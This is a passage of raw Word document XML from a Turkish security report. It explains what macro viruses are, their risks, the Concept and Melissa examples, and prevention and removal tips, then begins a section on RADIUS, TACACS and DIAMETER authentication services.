        <w:t xml:space="preserve"> Bir makro virüsü, yararlı gibi görünebilmesi ve kullanıcıların kötü etkilerini hemen fark edememesi açısından bir Truva atı virüsüne benzer. Ancak, Trojanlardan farklı olarak makro virüsleri kendilerini çoğaltabilir ve diğer bilgisayarlara bulaşabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16803B74" wp14:editId="50759F84">
            <wp:extent cx="2809188" cy="1965313"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1026" name="Picture 2" descr="makro virÃ¼sleri ile ilgili gÃ¶rsel sonucu">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4D398C4-5B8E-4B5A-AF83-A136A9627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kro virÃ¼sleri ile ilgili gÃ¶rsel sonucu">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4D398C4-5B8E-4B5A-AF83-A136A9627F0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360" cy="1971030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00581270" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3.3 Riskler</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Makro virüslerinin ana riski hızla yayılabilmeleridir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Virüs bulaşmış bir makro çalıştırıldıktan sonra, kullanıcının bilgisayarındaki diğer belgelere virüs bulaşır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Bu virüslerin bazıları metin belgelerinde eksik veya eklenmiş sözcükler gibi anormalliklere neden olurken, bazıları da e-posta hesaplarına erişip virüs bulaşmış dosyaların kopyalarını bir kullanıcının kişi listesindeki herkese gönderir; daha sonra, güvenilen bir kaynaktan geldiği için bu dosyalar açılır ve dosyalara erişilir.</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Bu virüsler, depolanan verileri silmek veya bu verilerin güvenliklerini ihlal etmek üzere tasarlanmış da olabilir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Buna ek olarak, makro virüslerinin platformlar arası çalıştığına dikkat edilmesi de önemlidir; aynı kodu kullanarak hem Windows hem de Mac bilgisayarlara bulaşabilirler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Makroları kullanan programlar ana bilgisayar olarak çalışabilir ve e-posta yoluyla gönderilen, diskte veya USB sürücüde saklanan virüs bulaşmış programın kopyası virüs içerir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> Bu virüsleri kaldırmak için kullanıcılar, özel makro virüs algılama ve kaldırma araçları sağlayan güvenlik yazılımları kullanmalıdır. Düzenli taramalar, virüs bulaşmış belgeleri temizler ve yeni bilgisayar virüslerinin indirilmemesini sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00581270" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3.4 Makro Virüs Türleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Makro virüsleri birkaç farklı biçimde görülebilir. Bazıları bunların 1990'ların sonundan kalma olduğunu düşünse de son yıllarda yeniden dirilen bu virüs, kullanıcıların daha uyanık olmalarını gerektiriyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3.4.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Concept Virüsü </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Temmuz 1995'te ortaya çıkan ve Microsoft Word'ü hedefleyen Concept, ilk makro virüsüydü. Ardından makro virüsleri baskın virüs türü haline geldi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Melissa Virüsü </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Melissa, e-posta solucanı özelliği olan ilk makro virüsü olarak tarihe geçti. 26 Mart 1999'da e-posta yoluyla yayılmaya başladı ve saatler içinde on binlerce bilgisayara virüs bulaştırdı. İnternet tarihinin en ciddi salgınlarından biriydi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00581270" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00581270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Makro Virüsleri Önleme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Makro virüsler genellikle İnternet'te e-postayla paylaşılan uygulama dosyalarına, özellikle de kimlik avı e-postalarına yayıldığı için, makro virüs savunmaları, gelen e-posta eklerini taramak, kullanıcıların şüpheli dosyaları açmasını engellemek ve belgelerin tümünde makroların çalışmasını engellemek için doğru yoldur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B7564A4" wp14:editId="71A2D1AD">
            <wp:extent cx="3609976" cy="3705225"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="3074" name="Picture 2" descr="macro virus ile ilgili gÃ¶rsel sonucu">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A67D4969-9950-432D-8BD9-25FC11E1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cro virus ile ilgili gÃ¶rsel sonucu">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A67D4969-9950-432D-8BD9-25FC11E123BB}"/>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9976" cy="3705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77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Makro virüslerin yayılmasını önlemek için bazı teknikler şunlardır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> Bir spam filtresi kullanın. Kimlik avı yapan e-posta mesajları kullanıcıları gelen kutularına ne kadar az girerse, bilgisayarlarına kötü amaçlı yazılım bulaştırabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Güçlü bir virüsten koruma programı kullanın. Antivirüs yazılımı, şüpheli dosyaları indirmeye veya zararlı linkleri açmaya çalıştığında kullanıcıları uyarır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bilgisayarların mevcut yazılım sürümlerini çalıştırdığından ve tüm güvenlik düzeltme eklerinin yüklendiğinden emin olun.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bilinmeyen gönderenlerden ekleri açmayın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ekleri, şüpheli e-posta iletilerinde, bilinen gönderenlerden gelmiş gibi görmelerine rağmen açmayın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Microsoft Word ve Excel'de makro güvenliği işlevini etkinleştirin ve makroları etkinleştirme konusunda çok dikkatli olun.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Makro komut dosyalarını tamamen devre dışı bırakın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3.6 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Bir makro virüsünü kaldırma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Yayılmasını önlemek için bir makro virüsüyle enfekte olan tüm dosyaları kaldırmak önemlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> Makro kötü amaçlı yazılımları temizlemenin ilk adımı, virüslü bilgisayarı Güvenli Mod'da yeniden başlatmaktır .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> Tüm geçici dosyaları silmek, virüs taramasını hızlandırmaya, aynı zamanda disk alanını boşaltmaya ve kötü amaçlı yazılım bulaşmış geçici dosyaları silmeye yardımcı olacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB784B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E52BB7C" wp14:editId="16EF2B3D">
            <wp:extent cx="3629320" cy="1298355"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="4098" name="Picture 2" descr="macro virus ile ilgili gÃ¶rsel sonucu">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C669DEB-CCF4-425E-B887-4B39F3156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acro virus ile ilgili gÃ¶rsel sonucu">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C669DEB-CCF4-425E-B887-4B39F31565A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1762" cy="1309961"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:extLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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pPr>
      <w:r w:rsidRPr="007F7C0D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C881F86" wp14:editId="4D2E3A82">
            <wp:extent cx="2926080" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Resim 18"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Default="00E77DF4" w:rsidP="00E77DF4"/>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1.4.2-1.4.3</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TUNA AYYILDIZOĞLU</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30757023</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001830C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Centralized Authentication Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001830C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(RADIUS, TACACS, DIAMETER)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001830C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>William Stackpole, CISSP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İçindekiler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B04062" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B04062">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>AAA Hizmetinin Temel Özellikleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A178E4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A178E4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RADIUS: Uzaktan Kimlik Doğrulama Çevirmeli Kullanıcı Hizmeti</w:t>
      </w:r>
    </w:p>
